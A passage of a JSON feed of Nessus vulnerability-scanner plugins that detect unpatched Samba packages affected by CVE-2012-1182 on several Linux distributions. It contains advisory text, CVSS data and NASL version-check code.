(!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-doc / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:27", "description": "Fix for CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-23T00:00:00", "type": "nessus", "title": "Fedora 15 : samba-3.5.14-73.fc15.1 (2012-5805)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-5805.NASL", "href": "https://www.tenable.com/plugins/nessus/58823", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-5805.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58823);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-5805\");\n\n script_name(english:\"Fedora 15 : samba-3.5.14-73.fc15.1 (2012-5805)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=811392\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-April/078836.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64867e64\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"samba-3.5.14-73.fc15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:57:50", "description": "Samba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : samba on SL5.x, SL6.x i386/x86_64 (20120410)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:libsmbclient", "p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel", "p-cpe:/a:fermilab:scientific_linux:samba", "p-cpe:/a:fermilab:scientific_linux:samba-client", "p-cpe:/a:fermilab:scientific_linux:samba-common", "p-cpe:/a:fermilab:scientific_linux:samba-debuginfo", "p-cpe:/a:fermilab:scientific_linux:samba-doc", "p-cpe:/a:fermilab:scientific_linux:samba-domainjoin-gui", "p-cpe:/a:fermilab:scientific_linux:samba-swat", "p-cpe:/a:fermilab:scientific_linux:samba-winbind", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-clients", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-devel", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-krb5-locator", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120410_SAMBA_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61298);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba on SL5.x, SL6.x i386/x86_64 (20120410)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1204&L=scientific-linux-errata&T=0&P=972\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?391e04eb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-debuginfo-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-debuginfo-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:45", "description": "A vulnerability has been found and corrected in samba :\n\nThe RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call (CVE-2012-1182).\n\nThe updated packages have been patched to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-12T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : samba (MDVSA-2012:055)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64netapi-devel", "p-cpe:/a:mandriva:linux:lib64netapi0", "p-cpe:/a:mandriva:linux:lib64smbclient0", "p-cpe:/a:mandriva:linux:lib64smbclient0-devel", "p-cpe:/a:mandriva:linux:lib64smbclient0-static-devel", "p-cpe:/a:mandriva:linux:lib64smbsharemodes-devel", "p-cpe:/a:mandriva:linux:lib64smbsharemodes0", "p-cpe:/a:mandriva:linux:lib64wbclient-devel", "p-cpe:/a:mandriva:linux:lib64wbclient0", "p-cpe:/a:mandriva:linux:libnetapi-devel", "p-cpe:/a:mandriva:linux:libnetapi0", "p-cpe:/a:mandriva:linux:libsmbclient0", "p-cpe:/a:mandriva:linux:libsmbclient0-devel", "p-cpe:/a:mandriva:linux:libsmbclient0-static-devel", "p-cpe:/a:mandriva:linux:libsmbsharemodes-devel", "p-cpe:/a:mandriva:linux:libsmbsharemodes0", "p-cpe:/a:mandriva:linux:libwbclient-devel", "p-cpe:/a:mandriva:linux:libwbclient0", "p-cpe:/a:mandriva:linux:mount-cifs", "p-cpe:/a:mandriva:linux:nss_wins", "p-cpe:/a:mandriva:linux:samba-client", "p-cpe:/a:mandriva:linux:samba-common", "p-cpe:/a:mandriva:linux:samba-doc", "p-cpe:/a:mandriva:linux:samba-domainjoin-gui", "p-cpe:/a:mandriva:linux:samba-server", "p-cpe:/a:mandriva:linux:samba-swat", "p-cpe:/a:mandriva:linux:samba-winbind", "cpe:/o:mandriva:linux:2010.1", "cpe:/o:mandriva:linux:2011"], "id": "MANDRIVA_MDVSA-2012-055.NASL", "href": "https://www.tenable.com/plugins/nessus/58716", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:055. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58716);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"MDVSA\", value:\"2012:055\");\n\n script_name(english:\"Mandriva Linux Security Advisory : samba (MDVSA-2012:055)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in samba :\n\nThe RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\narray length in a manner consistent with validation of array memory\nallocation, which allows remote attackers to execute arbitrary code\nvia a crafted RPC call (CVE-2012-1182).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mount-cifs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64netapi-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64netapi0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbclient0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbclient0-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbclient0-static-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64wbclient-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64wbclient0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libnetapi-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libnetapi0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbclient0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbclient0-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbclient0-static-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbsharemodes-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libsmbsharemodes0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwbclient-devel-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwbclient0-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mount-cifs-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", 